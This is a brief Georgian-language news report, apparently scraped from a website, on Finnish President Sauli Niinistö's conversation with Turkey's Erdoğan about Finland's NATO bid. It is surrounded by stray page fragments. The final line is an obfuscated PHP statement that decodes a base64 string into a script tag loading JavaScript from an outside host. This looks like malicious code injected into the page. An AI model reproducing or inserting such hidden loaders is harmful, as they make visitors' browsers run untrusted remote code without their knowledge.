celsiusi
ავერსი საქკაბელი
ფინეთის პრეზიდენტის საული ნიინისტო ამბობს, რომ თურქეთის პრეზიდენტთან რეჯეფ თაიფ ერდოღანთან "ღია და პირდაპირი" საუბარი ჰქონდა. 
 
"ღია და პირდაპირი საუბარი მქონდა თურქეთის პრეზიდენტ ერდოღანთან. განვაცხადე, რომ როგორც NATO-ს მოკავშირეები ფინეთი და თურქეთი ერთგული იქნებიან ერთმანეთის უსაფრთხოების მიმართ და ამით ჩვენი ურთიერთობა გაძლიერდება. ფინეთი გმობს ტერორიზმს მისი ყველა ფორმითა და გამოვლინებით. ახლო დიალოგი გრძელდება",- დაწერა საული ნიინისტომ.
 
ცნობისთვის, ფინეთმა და შვედეთმა NATO-ში გაწევრიანებას მხარი ოფიციალურად დაუჭირეს. 13 მაისს თურქეთის პრეზიდენტმა თქვა, რომ შესაძლოა, თურქეთმა მხარი არ დაუჭიროს ფინეთისა და შვედეთის NATO-ში გაწევრიანებას.
679
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");